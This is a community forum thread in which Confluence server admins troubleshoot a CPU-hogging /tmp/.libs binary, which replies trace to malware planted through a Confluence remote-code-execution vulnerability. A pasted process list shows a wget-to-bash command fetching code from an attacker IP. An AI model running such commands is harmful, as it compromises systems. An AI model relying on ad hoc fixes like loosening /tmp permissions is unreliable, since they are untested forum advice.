Forums
Home Product Q&A Discussion groups Articles Ask a question Search
Learning
Events
Champions

Forums

Articles
Create
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
Product Q&A
See all
Community resources
Top groups
Explore all groups
Community resources
Learn
Community resources
Events
Community resources

Confluence. CPU at 100% in "/tmp/.libs" binary

Iván Dominguez
Iván Dominguez
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
Get involved
March 10, 2021

Hello, I have a Conflunece 6 on my own server, and sometimes a file /tmp/.libs created by confluence have the CPU at 100%.

 

I explore the binary and see it's a en elf executable and the file size is about 2 MB. I think it is any kind of java subsystem binary cache or the result of Java's AOT.

 

Stoping confluence and deleting it will regenerate when confluence starts again, first with small size, but over the time it gets bigger.

How Can I do to get less CPU usage?.

 

My confluence installation does not have any external plugin/extension except the Cloud migration tool.

 

Thanks.

Answer
Watch
Like Be the first to like this
1011 views

2 answers

0 votes
alx_th
alx_th September 3, 2021

Bad news. Just checked on my installation and this is true. 

https://therecord.media/confluence-enterprise-servers-targeted-with-recent-vulnerability/

View More Comments
Nalin Kularathna
Nalin Kularathna September 4, 2021

Hi,

thanks for informing. do you know any thing we can do for this issue. They are deploying some binary files whenever possible locations which has access to confluence user. I restricted all the places which has access by confluence user. After that it is running below things again and again.

 

conflue+ 26417 26416 0 18:58 ? 00:00:00 /bin/sh -c wget -q -O - http://1
conflue+ 26418 26417 0 18:58 ? 00:00:00 wget -q -O - http://195.3.146.11
conflue+ 26419 26417 0 18:58 ? 00:00:00 bash
root 26426 1006 0 18:59 ? 00:00:00 CRON

 

thanks,

Like
alx_th
alx_th September 6, 2021

They already have a patch for this vulnerability: https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md 

Like Iván Dominguez likes this
alx_th
alx_th September 6, 2021

After apply patch you need to delete all artifacts (installed apps/modified files) manually. Please check home directory of atlassian user

Like Iván Dominguez likes this
Reply
0 votes
Balu Thodupoonuri
Balu Thodupoonuri April 5, 2021

Hi Team,

 

Same issue here /tmp/.inis and /tmp/.libs files are eating 100% CPU and more into blogs, I found its malware inject and scanned for files using clamscan... I found files in the /tmp folder and deleted. Still when I delete the above .inis and .libs files they are re-creating it.

Please can you provide a solution for this. we use confluence 6.12.2.

View More Comments
Nalin Kularathna
Nalin Kularathna September 2, 2021

Hi team,
I also have same issue. please provide a solution for this. I deleted all files in tmp folder but they are still creating files and running them.

Like
Nalin Kularathna
Nalin Kularathna September 2, 2021

I temporary changed the tmp folder permission to 755. so only root can write to the tmp directory now.

Like
Reply

Suggest an answer

Log in or Sign up to answer
Confluence
Confluence
TAGS
AUG Leaders

Atlassian Community Events

    See all events
    Community
    Forums
    FAQs Forums guidelines
    Learning
    About learning Resources
    Events
    Champions
    Copyright © 2025 Atlassian
    Privacy Policy Terms Security
    Welcome illustration

    Welcome to the new Atlassian Community

    Online forums and learning are now in one easy-to-use experience.

    By continuing, you accept the updated Community Terms of Use and acknowledge the Privacy Policy. Your public name, photo, and achievements may be publicly visible and available in search engines.